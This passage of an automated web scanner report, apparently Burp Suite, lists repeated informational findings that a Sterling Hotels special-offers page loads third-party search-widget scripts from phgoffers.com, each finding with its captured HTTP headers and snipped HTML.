Content-Length: 63416

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232066755823750"></script>
...[SNIP]...

5.16. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067419105000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:25:41 GMT
Content-Length: 63362

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067419105000"></script>
...[SNIP]...

5.17. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232795773167500

Request

GET /sterling/special_offers/special_search_results.aspx HTTP/1.1
Host: www.sterlinghotels.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=aribfn453jpkib553yjej455; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; s_cc=true; s_sq=%5B%5BB%5D%5D; acopendivids=special_offer,iprefer_reward; acgroupswithpersist=nada

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 367104
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 21:39:36 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232795773167500"></script>
...[SNIP]...

5.18. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232061803480000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:16:19 GMT
Content-Length: 63444

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232061803480000"></script>
...[SNIP]...

5.19. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232098958011250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:18:15 GMT
Content-Length: 63441

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232098958011250"></script>
...[SNIP]...

5.20. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232697263323750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 18:55:25 GMT
Content-Length: 207191

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232697263323750"></script>
...[SNIP]...

5.21. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232100536605000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:20:53 GMT
Content-Length: 63406

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232100536605000"></script>
...[SNIP]...

5.22. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232068517230000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:27:31 GMT
Content-Length: 63449

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232068517230000"></script>
...[SNIP]...

5.23. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232066688011250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:24:27 GMT
Content-Length: 63355

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232066688011250"></script>
...[SNIP]...

5.24. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232100389886250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:20:38 GMT
Content-Length: 63406

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232100389886250"></script>
...[SNIP]...

5.25. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232061129261250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:15:12 GMT
Content-Length: 289631

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232061129261250"></script>
...[SNIP]...

5.26. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064391136250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:20:38 GMT
Content-Length: 63338

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064391136250"></script>
...[SNIP]...

5.27. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232066218948750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:23:41 GMT
Content-Length: 63397

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232066218948750"></script>
...[SNIP]...

5.28. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232796038011250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 367063
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 21:40:03 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232796038011250"></script>
...[SNIP]...

5.29. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232061386605000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:15:38 GMT
Content-Length: 207253

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232061386605000"></script>
...[SNIP]...

5.30. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232061334105000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:15:33 GMT
Content-Length: 289587

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232061334105000"></script>
...[SNIP]...

5.31. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232061941761250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:16:33 GMT
Content-Length: 63473

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232061941761250"></script>
...[SNIP]...

5.32. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064956605000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:21:35 GMT
Content-Length: 63353

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064956605000"></script>
...[SNIP]...

5.33. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232715394886250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 19:25:39 GMT
Content-Length: 207218

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232715394886250"></script>
...[SNIP]...

5.34. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232066078323750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:23:27 GMT
Content-Length: 63363

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232066078323750"></script>
...[SNIP]...

5.35. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232070050667500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:30:05 GMT
Content-Length: 63355

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232070050667500"></script>
...[SNIP]...

5.36. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064150355000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:20:14 GMT
Content-Length: 63360

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064150355000"></script>
...[SNIP]...

5.37. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232063416917500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:19:00 GMT
Content-Length: 63397

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232063416917500"></script>
...[SNIP]...

5.38. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232062092698750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:16:49 GMT
Content-Length: 63429

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
